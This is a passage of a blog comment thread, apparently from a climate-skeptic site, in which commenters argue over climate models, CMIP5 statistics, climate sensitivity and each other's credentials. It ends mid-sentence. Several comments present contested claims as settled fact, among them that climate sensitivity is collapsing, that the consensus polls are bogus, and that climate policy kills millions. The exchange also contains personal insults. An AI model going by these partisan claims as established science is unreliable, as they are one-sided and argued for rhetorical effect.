I said, “if this article appeared?” That does not mean that I imply that the danger to people around the world is inevitable or imminent. I may not believe that at all. Indeed, your minimization of the effects of GW/CC is dangerously ignorant of the facts on the ground; emperical reality; that is, climate data collected and analyzed, and projections made based on clearly defined assumptions. This is not model data, but model validation data from the real world. This doesn’t mean these projections will happen with certainty; each has an associated likelihood based on its set of assumptions about future climate events and remediation implementations. . In fact, it is you and those of like OPINION who are exaggerating, thus lulling the public and officials into a false sense of security. It is basically propaganda. You have no idea when global warming will pick back up and you have no idea how long it will last or how severe it will be, or what its acceleration will be.. There are climate scientists and atmopheric physicists who study this everyday and collect and analyze data everyday. Their job is to report their findings in scholarly journals with their research reports and findings subject to peer review, thus gaining a good measure of objectivity. . Your self-appointed job seems to be to take pot shots at these experts from the sidelines, calling into question their character, competence, honesty and motives for doing their work. Why don’t you learn something about the subject and people at which your throw darts in a way reminiscent of “Blind Man’s Bluff”? That way your criticisms would carry more weight. If you were competent to speak with athority on this subject, you would be a practicing climate scientist, and you would present your findings to substantiate your claims and be in line to win the Nobel Prize. Get with it; I wish you good luck. I you need an expert mathematical modeler, simulation expert, and big data analyst, I stand at the ready to lend you a hand. G. Mr. Grubbs, Yes, it does. As for my knowledge of empirical reality, which you hyperbolically claim I am “dangerously ignorant of,” how would you know? I commented on the 90 CMIP5 models versus the satellite data–that’s hardly an exaggeration–and the assumption that experts on NYT would claim “millions of people around the earth are in great danger from the effects of GW/CC,” which I have never seen in the comments section of the NYT…not from identified scientists. As for my “OPINION” being propaganda. No. It was a two-sentence comment on your remarks. Not a treatise. And not without the context of this thread. Ditto global cooling. What experts? I was talking to you. Facepalm. I prefer rgbatduke[ Dr. Robert Brown from Duke Univ] and others who comment here and are able to explain the physics of what modelers are unable to model because they don’t know yet. These are not anti-model screeds; they are measured assessments from their various fields about what the 35-year-old climate science doesn’t understand (for example, the ARGO data is barely a decade old; it will take another 30-40 years to make intelligent and realistic models about the oceans).. Who is trying to prove GW/CC false? What a ridiculous premise; cart before the horse. The point, or issue, is to discover the physics of what is going, cause not correlation. Or supposition. Or hypotheses declared as fact. Dearest Mr. Grubbs, Since you questioned my credentials, I am happy to provide them. Ph.D. in theoretical physics (dissertation on multiple scattering theory solution to single electron problem in crystal band theory). As an undergrad and grad student, after getting AP credit for calculus I completed two “introductory” math classes (multivariate calculus and linear algebra, the latter in the advanced section reserved for math majors). I then jumped to graduate courses in complex variables, PDEs, and functional analysis, all taught by Mike Reed (who literally wrote the book on functional analysis along with Barry Simon). In grad school I added two more graduate math classes — one on topology and one on the mathematics of classical mechanics (action principles, group theory, etc) taught in the math department, not physics. Six graduate level math classes (four taken as an undergraduate) was not a math major (I skipped e.g. number theory, ODEs, “advanced algebra” all required for a major anyway) and Duke did not offer minors at that time but OTOH they really covered everything but number theory to excess. I would honestly self-assess my competence in math (my research and dissertation were basically solving advanced PDEs) as easily equivalent to a BS in math, maybe even a masters, since at this point I’ve taught a two semester survey of math methods in physics that covered probability theory, ODEs, group theory, and so on, in addition to teaching quantum and electrodynamics, which is basically advanced vector calculus and algebra and group theory and right up against the edge of differential geometry (I sat in on around 1/3 of a course in differential geometry before research pulled me away as well). I’m still weak on number theory although I’ve worked through about half of a decent textbook on the subject, but I’m strong on things nobody even offers courses in, such as geometric algebra (e.g. complex number, quaterions, generalized clifford algebras — graded division algebras)). There are probably a few holes compared to an undergrad major who completed all of the sequence but the holes are where I’m not that interested as a physicist more interested in solving problems than formal proofs concerning abstract objects. OTOH I have lots of places where my knowledge is likely beyond most math Ph.Ds. What I am not, credentialling aside, is incompetent in math. Quite the contrary. I can walk to a board and start teaching calculus through (common) ODEs and PDEs without notes, and with a tiny bit of prep could teach a lot more. I’ve had only three courses in computer science — one intro, one on computer architecture, one on numerical methods — but again I, like many scientists whose work involves a lot of computation, have acquired professional competence in the field. If you google “rgb beowulf duke” you’ll still get around 15,000 hits, although back when the beowulf archives were online and the topic was happening it would have been closer to 250,000. I’ve been a professional systems/network administrator for 27 years, although I’m no longer particularly active in administration and my knowledge of current tools is probably limited (although easily refreshed). My personal subversion-based code tree is deep and wide and gigabytes in size. I periodically teach selected computer science majors independent study courses in CPS that count towards their majors with permission from the department. I’ve trained a number of systems admistrators. I wrote the first two versions of Duke’s security and acceptable use policies and was a primary faculty advisor to deans and vice-chancellors responsible for the development of Duke’s network as it evolved from twisted pair 56 kb serial lines to gigabit and internet 2. I am co-founder (CTO) of an internet security company that is just getting off the ground. I have written a book on the engineering of beowulf-style compute clusters and parallel scaling, wrote a daemon-based open source cluster monitoring software package that was popular for a while. I have written a small mountain of predictive modeling software — primarily advanced, genetically optimized neural networks but a smattering of nonlinear regression code back before R came out and made it silly to write your own code to do that sort of thing — and have founded two companies (CTO again, contributing both code and knowledge of statistics, probability theory, modeling, AI, pattern recognition, etc) doing predictive modelling for money, and the current incarnation of the second one is still extant: and making money. The last 15 years of my research career were spent doing large scale numerical simulations on homebrew linux-based parallel supercomputers (hence my connection to beowulfery) — primarily importance sampling Monte Carlo in condensed matter studies of critical phenomena (second order phase transitions) and autocorrelation, numerically solving Langevin/Generalized Master Equation sets to model quantum optics, and so on. I would say that I’m fairly expert on many, but of course not all, aspects of large scale computer modelling. It’s a big field. I’m hardly a novice, though, either in statistics, probability theory, computer science, predictive modeling, in particular applying Bayesian methods in the construction of super-advanced, nonlinear, multivariate models — models of extremely high dimensionality (as in up to hundreds of dimensions) — not to publish papers in the field but for the real payoff — to get paid for it, in competition with lots of other highly competent folks trying to do the same thing. Just for grins, I’m also the author of dieharder (you can google that, too), an open source suite of random number generator testing tools. One of my favorite books is E. T. Jaynes excellent “Probability Theory, the Logic of Science” — in a sense you could call me a disciple of Jaynes as he was also a primary reference for some of my work in optics although I never met him professionally. You can take it for granted that I am highly knowledgable about hypothesis testing, the Cox axioms as the basis for axiomatic probability theory and epistemology, quantified doubt as the basis of sound knowledge, the Bayesian “loop” of priors, models, and posterior probability correction based on empirical outcome, stuff like that, and not in any sort of ivory tower sense. In recent years, I have become something of a devotee of William Briggs, a professional statistician who spends much of his time, curiously enough, tearing the statistical basis of much of climate science to shreds because its statements are all too often indefensible nonsense. My credentials in climate science per se are still fairly limited. I’ve been studying the field for five or six years at this point. I’ve worked through Grant Petty’s excellent book, “A First Course in Atmospheric Radiation”, although I may have mislaid my copy while teaching physics at the Duke Marine Lab this summer and will probably have to purchase a new copy. Most of the physics in it I’m already familiar with from working in and teaching E&M, quantum mechanics, thermodynamics/stat mech, and so on, so the book is comparatively easy for me to understand. I’ve also worked through Caballero’s textbook on climate science, which walks one through things like basic thermo (already known) and up to in-context discussions of things like the adiabatic lapse rates dry and wet, reduced temperature, atmospheric potential, the greenhouse effect. The one thing I haven’t really done much with personally is fluid dynamics — I know a lot about it (from teaching the intro levels if nothing else) but Navier-Stokes and the solution of actual physical fluid models near the various nonlinear critical points (onset of turbulence, for example) I have not done actual computations in. That does not stop me from reading about it, understanding the general structure of the PDEs involved, and appreciating the incredible difficulty of solving them. Mathematicians don’t even have existence proofs for NS — it is a grand challenge problem. Which brings me to my own opinion on the subject, you can judge on any basis you like if it is ill-founded or ignorant. Climate models attempt to solve two nonlinearly coupled NS-systems — the atmosphere and the ocean — externally driven by both nearly periodic drivers and by what amount to “random” modulators, some of which are long-period internal feedback loops within the highly non-Markovian system itself with its broad spectrum of autocorrelation times. They attempt to do so on a grid no smaller than 100x100x1 km in size at the equator, with timesteps of ~100km/340 m/sec = 5 minutes (the time required for sound to propagate across the non-uniform lat/long cells, but absurdly long compared to the vertical propagation time or the oceanic propagation times). Since the Kolmogorov scale for nonlinear dynamics in the atmosphere is order of 1 mm, these spatiotemporal cells are order of 10^7 x 10^7 x 10^5 x 10^7 = 10^26 — 26 orders of magnitude — too large to have a good chance of actually solving the NS equations. One can argue that one can coarse grain at this scale, create smoothed approximations of the cell dynamics, and solve systems like this and have the solutions obtained end up being meaningful, but there is no evidence that this is the case. In fact, there is substantial evidence that this is not the case, both from many other nonlinear chaotic systems where the minimum scale for microscopic dynamical models is the minimal scale for a reason (that reason being that you get garbage if you try doing the computation at coarser resolutions), from plain old numerical computation theory of quadrature where we know perfectly well that we cannot even numerically solve completely deterministic and boring systems like planetary orbits with a coarse timestep and little error control and end up with anything like the actual answer, especially after many timesteps, and above all, empirically — because the models suck at predicting anything outside of their reference period. I strongly suggest that you download Chapter 9 of AR5 and read it in its entirety, but especially sections 9.2.2 and ff — where they acknowledge that the multimodel ensemble mean is completely meaningless as far as being supported by the axioms of probability and statistics are concerned — and that no effort is made to subject the individual models of CMIP5 to a simple hypothesis test by comparing their individual runs to the data. This is not done because if it were done, the game would be instantly over. Turn to figure 9.8a in AR5. This figure presents a spaghetti graph of the CMIP5 models (sufficiently jumbled together that it makes it difficult to see instantly how terrible they really are individually at predicting the climate) against both HADCRUT4 (primarily) and the meaningless MME mean. Note well that each curve in the spaghetti is already a perturbed parameter ensemble mean of anywhere from a very few to hundreds of runs (yes, this asymmetry of data contribution is a problem, see 9.2.2 and ff). Since the variance per model is nevertheless much greater than that of the actual climate (and since none of these averages come anywhere near tracking the actual climate) we can fairly safely assume that if we were to compare individual model runs to the climate their variance would be around an order of magnitude too large. This alone would be instant cause for rejection in the specific sense that the model in question is clearly inadequate to use at all as a basis for formulating public policy that is killing millions of people a year now by misdirecting funds that could be used to (for example) end world poverty and the preventable deaths of children into a hypothesis of “catastrophe” that has no sound theoretical or quantitative support. The models do not just fail in the present. They also fail, badly, to hindcast the past. Note well that the collective MME mean spends roughly 90% of its time warmer than the actual global average temperature even in the past all the way back to the beginning of HADCRUT4. It utterly fails (as to the individual models) to reproduce the signficant climate variations of the early 20th century as well as the entirety of the 21st century. Indeed, the only time it does a good job is in the reference period! You seem to claim to be a professional predictive modeller. How impressed are you by a model that fits its training data but fails to predict either trial data from the past or future data with any skill? What would you estimate the p-value is of the null hypothesis “this model is a perfect, valid model of the climate” comparing the outcome of each of the models in the spaghetti to reality, one at a time, in 9.8a? Eyeballing an crude estimate based on the probability of the MME being too high 90% of the time instead of 50% of the time given at least 10-12 independent “trials” (with a presumed autocorrelation time of a decade) we get what, exactly? And the MME is going to be an upper bound on p for almost all of the PPE means, and the PPE means themselves aren’t even the proper basis for the hypothesis test — one really has to determine the probability of getting the actual climate given the envelope and distribution of PPE results, not just global surface temperature anomaly but results in several other dimensions — global distribution of rainfall, prediction of LTT, etc. Seriously, anyone who knows anything at all about modelling would reject (almost all) of the CMIP5 models out of hand, one at a time or collectively, if their skill were rigorously compared to reality. If you were shown this data, told that it was a prediction of some stock in the stock market, would you invest in it? Only if you were a serious gambler. If you’d bet on AR3 predictions to within almost 100%, you’d be broke today./ In real science, rather than fund-me-to-save-the-world science, nobody would be surprised by the failure of the models to have any skill. We wouldn’t expect them to, as they are just modified weather models and we already know weather models have no skill as little as weeks out. We wouldn’t expect them to, as we already know that dynamical models of this type do not fare well when integrated at a scale twenty-plus orders of magnitude too large. We wouldn’t expect them to, given that the scale of integration is too large to resolve lots of meso- not even micro-, meso-scale energy transport phenomena that are critical to the climate system, such as thunderstorms, clouds, the water cycle in general, soil, vegetation, rivers and reservoirs, the UHI. All of these phenomena are rolled into ad hoc phenomenological terms for the cells that we are then told are “physics based” as if this is either true or relevant when solving the NS equations at an absurd resolution. The models as solved aren’t even conservative and have to be renormalized regularly to prevent drift, and all of this is with parameters for critical process that aren’t even set to be the same between models. Finally, the models in CMIP5 aren’t independent, aren’t unbiased samples drawn from some sort of pool of models, so we have no a priori reason to trust either the mean or any of the moments of collective statements about the climate. It would be a miracle if they worked. This is why climate scientists are back-pedalling as fast as they can as the climate has finally started to deviate from the models by enough that no amount of statistical band-aiding or obfuscatory graphing of the models compared to reality can conceal this simple fact from the politicians who have been more or less deliberately misled for nearly twenty years now by a comparatively small, but powerful, group of other politicians and climate scientists who have effectively controlled the funding of the entire multidisciplinary science. The oceans are not rising any faster than they have from time to time over the last 140 years. The temperature is varying with the same general pattern it has followed for roughly the last 165 years. LTT’s have been flat for most of the time we have measured them with satellites. The global surface temperature anomaly has been flat for long enough that AR5 has an entire Box devoted to ex post facto explanation of this inconvenient truth, and the continuation of flatness for another whole year and continued semi-fizzle of the ENSO event that was supposed to “rescue” the models has — so far — encouraged the number of “explanations” for this pause to double in the literature in the meantime. “Climate sensitivity” is in free-fall, down from Hansen’s absurdities of 5 C or more by 2100 to under 2.0 C in the current warmist literature and the data is looking like it is supporting an even lower estimate of 1 to 1.5 C. Indeed, all of the warming in the era where CO_2 has substantially increased — call it 65 years — has occurred in a single 15 to 20 year burst from 1978 (or 1983) to 1998. All of the rest of that stretch temperatures have been flat to slightly descending. There is one simple way to understand this — a way outside of the complexities of climate models. If we assume even a single layer model like that expressed in Petty, we can easily — for a given set of absorptivities — find the fixed point, including the warming due to the GHE. This model is basically a linear model — the absorptivities and albedo are held to be independent of the temperature, and if one makes it into a dynamical model by assigning some heat capacity to the various reservoirs if one increases the initial temperature of the reservoirs over the fixed point it will be driven back to the fixed point. If, OTOH, the absorptivity is itself a function of temperature, it isn’t so simple. Suppose absorptivity increases (approximately) linearly with temperature, also known as “positive feedback” (from e.g. water vapor) in the vicinity of an initially assumed, consistent, fixed point. Then increasing temperature increases absorptivity. There is no longer any clear fixed point. If average temperature increases monotonically with absorptivity, and absorptivity increases monotonically with temperature, even if the system has fixed point for some initial conditions it isn’t clear that that fixed point will be stable. Natural fluctuations will drive the fixed point itself into a random walk. Random walks are themselves not stable — they diverge like the square root of the number of steps. The system must have negative feedback to be globally stable to fluctuations in a Langevin-type model of driven dynamics plus random noise — its response to any positive fluctuation in absorptivity driven “gain” has to be to decrease, not increase the effect of the fluctuation on the average (fixed point) itself. Otherwise in a warm year, net water vapor content would (on average) increase, which would increase absorptivity from water vapor as a GHG, which would shift the fixed point up, so that the system did not return (on average) to the same fixed point it started from but to one a bit higher. Fluctuations up and down would not average out to zero, but to a steady drift either up or down, like a random walk in 1D. Only if increasing water vapor has a compensating nonlinear effect, such as increasing average albedo, to make net feedback negative will the system return to its former fixed point. Indeed, the nonlinear dynamical fixed point would have positive feedback if it was too cool, negative if too warm. It would resist both perturbations in the water vapor channel itself and additional forcing from CO_2, not augment it. In other words, there is a very good reason — long before one builds models — for thinking that the system is moderately stable, and that the average temperature is in fact the sort-of fixed point where things like water vapor feedback change sign, so that warmer cools, cooler warms, by modulating the entire water cycle — not just absorptivity, but albedo and latent heat transport. If this collective nonlinear cycle produced positive warming feedback in the neighborhood of its fixed point(s), the system itself would probably be unstable and the Earth would be Venus. It does not. On the cooling side things are more worrisome as the Earth is at least bistable, maybe tristable, with both the current deep glacial oscillation as a known stable cold phase and a spectrum of shorter period not-so-deep glacial oscillations from the earlier part of the Pliestocene to worry about as a third locally stable state of the system. There is strong evidence in the ice core data that the Earth can plunge into cold phase in as little as a decade when conditions are right, given remarkably little alteration in the driving/forcing. Since we do not properly understand this bistable behavior (well enough to predict it with much skill) and we absolutely do not understand the underlying multivariate dynamics, quasi-particle large scale structures or dynamical variations in either driving (such as ENSO, the PDO, the NAO, the solar cycle, Milankovich stuff) it is very hard indeed to say if the Earth’s global state on geological time scales is unstable to cold phase transitions. The LIA suggests that it might be. There is little evidence that even the interglacials have a warm phase that is accessible that is more than a degree or so warmer than current temperatures, either in the record of the Holocene, in ice core data, or in longer term radiometric proxies, although the 600 million year record is one of steady, systematic variation right down to the current all time low of global average temperature. rgb RGB, I never questioned your credentials. You must have me confused with someone else. I did say that some people are throwing around their academic degrees like insecure ivory tower types (or something like that), but you are certainly not included in that group. In fact, I paid you a compliment by citing your entries as the only ones that seemed competent and clear and contributed to the question at hand. Be sure that I will check out your claims to see if they hold water. My gut tells me that there are flaws in your arguments, but it will take some effort to unpeal your onions. But, now that you’ve self-disclosed, I think you went much to far overboard. You are now acting like an academic twerp in my opinion. We all can sling degrees and academic accomplishments around can’t we. What does that prove? What does theoretcal physics prove? What does anyone’s degrees prove? I will cave to peer pressure and briefly follow suit: I have degrees in applied physics, applied math, computer science and philosophy of science. I started college courses when I was 14; took modern algebra, topology, advanced caclulus, advanced differential equations, and complex analysis before I entered college. (I had all kinds of academic awards; am a member of Phi Kappa Phi, Sigma Xi, etc). I don’t have PhD, only two masters. I elected to work in the real world for over 53 years and I am still at it. I learned more practical knowledge in my first year on the job that my entire classroom experiences, although they were valuable to my career in learning how to solve problems, and learning how to learn. So what does that prove about my knowledge of climate science. By and large, nothing. The same is true for you, a theoretical physicist, although I found your exposition on atmospheric physics possibly enlightening if true, but I sensed it to be speculative to some degree. So, let’s stop this academic “pissing contest” – you win – you can piss further than I can. You can piss further than anyone can. You are the winner! Now, let’s start from there and have a reasonable discussion of current climate science (established) facts, and what the climate scencarios for the world to come are likely to be and state the various likelihoods. glg rgbatduke September 9, 2014 at 9:42 am IMO the warmest interglacials, such as the Eemian (MIS 5), MIS 11 & MIS 19, were globally at least a few to several degrees hotter than now, & even in the Holocene, its warmest intervals have been more than one degree warmer than now. Sorry, I guess I forgot the block quote: Perhaps I misread this. Note that I didn’t talk about my second major in philosophy (irrelevant) or for that matter, my physics Ph.D. beyond the general topic of my dissertation. I was providing you with my experience in advanced applied mathematics (which you questioned), explaining that while I don’t have a Ph.D. in mathematics I have enough graduate courses and teaching experience to very likely be able to get one, if that mattered (theoretical physics is basically mathematics anyway), indicating that I have an enormous amount of practical experience with math modelling, computer simulation development/validation, computer software development, and big data analysis/data mining IN THE REAL WORLD. I thought I was just answering your explicit questions when you questioned my qualifications to comment on computer modeling. Data mining? Second company — really third. Computer simulations and modelling? Papers in Physical Review. Software development? I teach it, and have a few gazillion lines of code to my name, including writing the actual software that launched both of the companies above that do/did modeling and part of the key software for the third (security) company. So I’m puzzled. Why would you deny your own words in the very same thread that they are clearly stated? Oh, and I forgot to note: I work for free. Sadly, the Big Oil companies have not seen fit to add me to their under-the-table payouts for doubting much of climate science. Not surprising since energy companies in general are prime benefactors from the panic. rgb I stand corrected if you were “just” addressing my request for your real world experience, plus PhD in Math. Forgive me my sins. You really don’t look that old, so how in the world did you achieve those earned PhDs and do all that real world work (for free?), and those zillions of lines of code in just a few decades? What languages do you code in? You do use OOP don’t you? Do you also design your own databases? What DBMS do you use to host the massive amount of data you probably analyze? Do you develop global warming and climate change models, or is your math modeling in physics? In any case, you appear to be the most qualified person in this comments thread and I have said so. I will check out your assertions. Thank you for your service. :-) For what it is worth, you may want to read this: Signing off now. On the whole, it’s been an awful experience. Good luck to everyone. :-) Now, back to some real work. You are forgiven, provided that the rest of the questions you continue to ask are actual questions, and not sarcasm intended to cast doubt on my qualifications. I’d have to say that your first post was exactly that, the second in reply to my statement of qualifications was in denial of your first, and I’m not certain about the third. You’ve probably left the thread, which is fine (because yes, people will hammer on you here — bear in mind that I spend as much time correcting people who want to “deny” that the GHE exists at all as I do casting IMO well-deserved doubt on the statistical or computational skill of the CMIP5 models that are (really) the sole basis of support for all of the predictions of doom and gloom) but in case you are still here I will answer your remaining questions as if they were indeed honest and not sarcasm. I’m 59 — so I’m probably older than you think, based on my picture. White beard. Largely absent hair. Pudgier than I should be. Recall that I don’t have a Ph.D. in math, or even a BS, but that doesn’t mean that I am in any way incompetent or narrowly educated in math either formally or on my own. The whole point of a Ph.D., BTW, is to learn to learn on your own, so you can continue to learn for a lifetime without further instruction. People don’t get a Ph.D. and then “freeze” their knowledge or skills the day after they get their dissertation finished. I have coded at least one program in at least the following languages (I doubt the list is complete): C, C++, PL1, Fortran (several flavors), assembler (several architectures), APL (I coded Mastermind in APL on an IBM 5100, a fact that at one time had me being accused of being John Titor:), Basic (several flavors), Pascal, Perl, Python, bash/bin/sh, tcsh, tcl/tk, matlab/octave, supermongo (don’t ask), awk, sed (if you consider sed scripts coding), PHP, and as I said, there are probably a few I’ve forgotten — javascript, java (but only barely), dunno… not really lisp, mathematica yes, and I forgot Macsyma and a macsyma predecessor I can no longer remember the name of (working on implementing group theory products for complicated groups for my advisor back in the 80’s so he could test various theorems he was trying to prove)… I don’t, actually, prefer OOP. Consider that a sign of my age, if you like. One can program in object-oriented style in any language, but it is remarkably difficult to program procedurally in an OOP as the syntax and methods conspire against it. Ditto, really, for list-oriented langages — never cared for them although sure, they are great for certain kinds of tasks. I have designed my own databases, but I taught myself all the databases I have used. Practically speaking I learned SQL in the context of implementing mysql and for a while put a mysql db behind several websites I ran more for grins than anything else. We used mysql in my first (neural net based) predictive modeling company, but my primary partner is/was a database consultant and is good at it so he actually wrote most of the mysql code and interface and I just used it or sometimes tweaked it. In my more recent company an external consultant steered us towards mongo — the supermongo mentioned above is no relation — so I had to learn javascript and its objects and nosql interfaces. As it happened, mongo was an absolutely terrible choice (at that time, it was still somewhat under development) because its fundamental data structure was a data tree and one had to descend the tree to the leaves in order to do the equivalent of certain selects, which scaled like molasses when we were churning through many GB of data in deep tables. We backed off and went to mysql, and at that point I stopped writing most of the code and doing most of the actual work as we had employees that are better at DB work than I am and I’m not stupid. At this point I have no idea if we’ve gone to Oracle or something else — I doubt it, as I don’t “think” we will have exceeded mysql’s sensible capacity, but I no longer am involved in daily runnings and don’t know. I don’t do much physics research any more (which is why climate science is my hobby, as it were) but when I did large simulations there was no point in storing more than e.g. random number seeds and processing the data as it came in so I never had need for a DB (or even a spreadsheet) to manage data. Finally, I myself do not develop climate models, because I a) lack support for doing so and I work for a living doing other things, and one cannot develop climate models as a hobby, it’s pretty serious business; b) if I were to develop a climate model, I would start with an open source model such as CAM and not reinvent any wheels I didn’t need to. I’ve actually gone as far as downloading CAM 3.0, but (as usual, sadly) the code is a nightmarish rat’s nest and is far, far from build ready. It would take even me (and yes, that is bragging) a week or two of serious work to get the code running on my local hardware, assuming it would fit; c) which is a problem, as my “local hardware” is now pretty much personally owned — my beowulf cluster of yesteryear is obsolete and gone away, and my personal “cluster” is a single multicore workstation plus a handful of multicore laptops. That actually might be enough to run CAM, slowly, on top of MPI, but to finish any sort of serious computation even to validate that the CAM build is working would take a long time. For a baaad meaning of the word long. In order to run and finish any sort of serious work in even your lifetime, I would need a real cluster, and to buy a real cluster I ‘d need support, see a). That hasn’t stopped me from reading the source code and documentation for CAM, and I have a pretty good idea of how it works. But you are naive in the extreme if you think that it is easy, or even possible, to do a serious check of CAM or any other GCM without substantial support. It’s a full-time job, really a full-time job for several people, and requires a dedicated parallel supercomputer with hundreds to thousands of nodes. Remember, they are trying to cover the 5 x 10^8 km^2 surface area (x 10 km in height, plus some possible cells in the ocean with depth) with cells that are at most 10^4 km^2 — CAM is more like 10^5 km^2. So one needs to integrate anywhere from 10^4 to 10^6 cells decades into the future in e.g. 5 minute timesteps, solving systems of coupled differential or difference equations with at least nearest neighbor coupling in a Markov approximation. This isn’t something you’re going to easily, or quickly, do on any small cluster, although CAM is coarse grained enough one probably COULD get it to run on a comparatively small cluster. Hopefully, that answers all of your questions. Note well that one doesn’t have to run the code in order to decide whether or not you trust the result, any more than one has to personally perform a double blind, placebo controlled study to decide if you trust experimental evidence that an antibiotic can usually cure a particular disease. Nobody should trust a marginal result (one with a p-value close to the arbitrary level one considers “significant”) because of the ease of accidental data dredging and because the world is littered with the scientific corpses of well-reported marginal results. Everybody should trust a non-marginal result validated by multiple independent researchers (especially by at least a few with no vested interest or investment in the antibiotic in question), where the probability of the data given the null hypothesis of no effect is so small that it might as well be zero. Why do you think climate science models are any different, or get a “by” on validation outside of training data? The really sad thing is that the IPCC openly acknowledges this, repeatedly, in the various ARs. I’m too lazy to look up the exact quotes, but AR3 clearly stated that the models had little skill, couldn’t be relied on to make quantitative predictions, and that this situation might well not change in the future due to the difficulty of the problem — before going on and using them to make quantitative projections, as if changing the name from skill-free predictions to unvalidated projections made it ok to use them as if they were predictions without the annoyance of having to survive a hypothesis test, that is, show some skill at solving the problem they were trying to solve in comparison with future data. A practice that continues today. In a single paragraph in AR5 the following statement is made: Translation: We have no axiomatically defensible way of arguing that the MME mean is more accurate than any of the contributing models, and the variance of this mean is meaningless as an indicator of the probable error. In the next paragraph they then indicate that yes, they really should subject the individual models to a hypothesis test before including them, yes, they should use Bayesian methods to refine the models by altering their hypotheses to reduce disagreement with the real world or to make meaningful error estimates on their predictions, yes, they should take into account the non-independence of the models — none of this, of course, is actually done in figure 9.8a or in most of the work done on the basis of the models, but it certainly should be done. When it is done, it will rigorously reduce climate sensitivity and increase error estimates though, though, (because the models systematically run too hot, duh) which rigorously reduces the impetus to invest huge amounts of money ameliorating the hypothetical climate catastrophe. What if the corrected model(s) showed that there was no catastrophe to be expected? All of those modellers, potentially out of a job. All of those peasants who’ve paid hundreds of billions of dollars to fix a non-event, armed with pitchforks and torches. All of those congressional subpoenas. Heads could roll. Literally. Prison sentences might well loom if even a hint of academic dishonesty or a cavalier statistical treatment supported by confirmation bias and cherrypicking came to light, because this isn’t like making a self-correcting stupid mistake about seeing a trans-luminal neutrino and announcing it before it is thoroughly checked and confirmed, it costs real money and lives all over the world on the basis of statements made that trade on the presumed honesty of the science. The reputation of science itself would suffer, everywhere. It’s one of many reasons I, and a surprising number of my colleagues, care, and don’t take the many pronouncements of doom as seriously as you might think that they do if you read silly contrived sound-bite statements such as “97% of scientists agree”. First, 97% of all scientists don’t agree on pretty much anything. Well, maybe gravity. Or maybe not even gravity. Isn’t that really just spacetime curvature? Or rather, I meant to say a field mediated by gravitons? Or is it really a matter of interactions in string theory at the Planck length? Perhaps not even gravity. Second, the polls quoted were silly polls, and didn’t ask the right questions. They poll one question, but then attribute the “97%” to a completely different conclusion, and the 97% itself is sketchy in the extreme. Honestly conducted polls find that only around 90% of climate scientists believe in anthropogenic global warming, and that over half of them think that there is now and will be some anthropogenic global warming in the future but it probably won’t be catastrophic. I’d guess that the fraction that “believe” in non-catastrophic warming is increasing, given that climate sensitivity is in free fall and will continue that way unless/until warming clearly resumes. Anyway, personally I hope you reconsider your decision to avoid WUWT and/or threads like this one. Yes, sometimes you’ll take some heat for daring to advance the notion that CAGW/CACC is a proven reality — but that’s the whole point of the venue. You can advance that point of view; but you’d better be prepared to defend it. And listen to people who will try very hard to convince you that you are wrong. No, the discussion won’t be devoid of logical fallacy, and people may call you names, but most of us disapprove of that when it does happen. rgb Khwarizmi, you lectured Peter on Logic 101, the ad hominem fallacy, yet you failed to similarly lecture those you agree with on their Furtive Fallacies, to wit: “climate scientists are in it for the funding,” “there is more milk in the teat,”, etc. They attribute what they term as “alarmist” or even false reports on GW/CC to the claimed malfeasance of climate scientists. Shame on you and them. No one here seems to understand the basic science involved in GW/CC, nor how to properly study it, yet they throw their textbook equations and advanced degrees at each other like insecure children. Get into the real world and out of the ivory tower; they are two different realities. George Grubbs You write NO! You nasty little troll! You demanded the qualifications of regbatduke and he gave them together with much other information, explanation and detail. You now pretend that he boasted of them when in reality he had replied to your demand. Academic qualifications are not taken as evidence of anything here, they are rarely cited, and they are ignored. They are NOT thrown at each other precisely to avoid the childish and untrue accusation you make and I have quoted. Your claim that rgbatduke doesn’t understand the basic science of the global warming scare is laughable in light of his reply to you. And several of us who contribute here have published ion the subject! Are you an employed troll? If you are then your performance does not merit you getting your pay. Richard You need to seek help. Before you go see your psychiatrist, examine my statement to RGB who I have said here has presented solid and credible claims regarding the global warming issue. I hope his statements hold up to peer scrutiny. Here is my statement regarding his credentials that you so vehemently condemn while assassinating my character and reputation. I forgive you in advance of you asking for forgiveness. And, I hope you enjoy your mental masturbation. .” So, I am asking for his “experience.” He does not have much, if any, real world experience in the disciplines I mentioned that pertain the climate change forecasting. So, my mentally unstable friend, I wish you the best. And, don’t forget to take your meds! Oh, “I hope you guys win the Nobel Prize when you prove GW/CC false” as you spend hours upon hours trying to do here when you’re not insulting other commenters. Hey, write a paper and have it published in “Science.” See what kind of response you get. Have a nice day. :-) Providing them a false sense of security? Well, YOU are actually murdering people each year with your ACTUAL sense of security and faith-based belief in your models: Am I to stand by as innocents world-wide are crucified on your belief that the models and the government-paid so-called “scientists” are correct? 25,000 “excess” people died of the cold and in the UK alone last year due to your energy policies and deliberate high prices mandated by the false CAGW promise of a possible heatup in year 2100 possibly causing problems maybe. So these 2,150,000 deaths between now and 2100 are the real result of YOUR fears of that possible problem, but many million others worldwide are killed each year literally by parasites (dirty water due to no concrete, no steel, no power to clean and distribute pure water, to treat their sewage, to store their food, to grow and harvest more food, to clean and wash their dishes, to filter their air now polluted as they cook their meals over the heat only possible by dried dung, harvested by hand from the animals they feed by hand. And YOU want that life of early deaths and lives spent in dirt, poverty, and want for these people? Why? Because YOU want them to die this way every day, in every other country of the world? The climate priests of your religion are far from objective: The objective facts are that today’s energy provides good results that people want and and need, that save lives, improve their lives, and improve the world. The CO2 released from some of these energy systems also provides only good – only value no measured dangers (except the propaganda spewed by your religion of a future harm unless we kill innocents now) and has resulted in a 7 to 23% increase in every plant growing worldwide in every country and province. More food, more fodder, more fuel, more farms, more fish and less famine! The climate priest whom you worship do have a job: That job is to justify to their government program managers the 1.3 trillion in new taxes and political control made possible by their computer programs promising uncertain future climate change so their politicians can maintain their control over the people living their politician’s world. Geez, again you commit logical fallacy after logical fallacy. “I am a murderer,” “faith-based belief,” “innocents are crucified,” “so-called” scientists, and so on ad nauseum. Argument from hyperbole, more strawmen arguments, more red herring arguments, false, shallow statements and claims with nothing to substantiate them … your responose is nothing short of an emotional personal rant. I can’t have a reasonable and rational discussion with someone who continually commits these fallicies. We are not getting anywhere. I have more important things to think about and write about than constantly answer you and point out the weakinesses in your arguments. Therefore, I am retiring from this thead seeing that I have to deal with dogmatism and beliefs that approach a trance-line religious state based on emotion and ignorance, and I believe, greed and self-interest (a personal belief based on common threads in the preponderance of ‘Comments’ responses. You will have to seek out someone else to ply your illogical arguments trade on. My offer to assist you in developing a quantifiable alternative theory to the current theories of GW/CC scenarios still stands. By the way, my services will be free of charge ,and I will supply the computer power, and brain power. G. George, this is 